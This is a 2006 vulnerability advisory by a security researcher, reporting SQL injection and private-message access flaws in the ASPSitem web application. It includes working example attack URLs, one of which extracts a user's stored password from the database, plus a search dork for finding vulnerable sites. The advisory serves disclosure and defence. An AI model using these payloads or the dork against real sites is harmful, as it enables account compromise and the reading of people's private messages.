Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12876
HistoryMay 30, 2006 - 12:00 a.m.

Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.

2006-05-3000:00:00
vulners.com
12

–Security Report–
Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 27/05/06 08:26 PM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: ASPSitem (http://www.aspsitem.com)
Version: 2.0 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL
queries to bid parameter in Anket.asp.
Remote attacker also can read others private messages.The parameter id
in Hesabim.asp did not sanitized properly
for checking the owner status of private message.
Level: Critical

How&Example:
SQL injection ->
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
EXAMPLE ->
http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20
id%20like%201
with this example remote attacker can leak userid 1's login
information from database.
Read others private messages ->
GET/EXAMPLE ->
http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername

Timeline:


Original advisory can be found at: http://www.nukedx.com/?viewdoc=39

Dorks: "Teşekkür ASPSitem"